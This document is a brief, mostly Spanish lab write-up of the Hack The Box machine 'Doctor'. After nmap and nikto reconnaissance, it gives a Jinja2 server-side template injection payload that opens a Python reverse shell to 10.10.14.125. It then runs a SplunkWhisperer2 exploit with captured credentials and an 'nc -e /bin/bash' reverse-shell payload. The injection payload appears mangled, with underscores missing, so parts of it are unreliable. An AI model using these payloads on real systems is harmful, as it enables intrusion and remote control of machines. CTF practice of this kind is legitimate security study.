nmap -A -p- -oA output 10.129.2.21 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210830150902.png

nmap -sC -sV -O -p- -oA doctor 10.129.2.21

nmap -sU -O -p- -oA doctor-udp 10.129.2.21

nikto -h 10.129.2.21:80

Pasted image 20210830151046.png

whatweb 10.129.2.21

Pasted image 20210830151615.png

http://10.129.2.21

Pasted image 20210830151813.png

http://doctors.htb

Vemos que es una aplicacion con flask y python

Pasted image 20210830152341.png

curl -s -X GET "http://doctors.htb/login?next=%2F" - I

Pasted image 20210830152542.png

Registramos un usuario

Pasted image 20210830152912.png

Vemos que se puede hacer un SSTI

Pasted image 20210830154323.png

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

Exploit the SSTI by calling Popen without guessing the offset

Vamos a new message y en el titulo ponemos

{% for x in ().class.base.subclasses() %}{% if "warning" in x.name %}{{x()._module.builtins'import'.popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.125",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash", "-i"]);'").read().zfill(417)}}{%endif%}{% endfor %}

Hacemos un refresh en:

http://doctors.htb/archive

git clone https://github.com/cnotin/SplunkWhisperer2

Pasted image 20210830161120.png

python3 PySplunkWhisperer2_remote.py --host 10.129.2.21 --lhost 10.10.14.125 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/bash 10.10.14.125"

Pasted image 20210830161536.png

nc -lvnp 443

Pasted image 20210830162359.png

boxes

copyright©2022 Cu3rv0x all rights reserved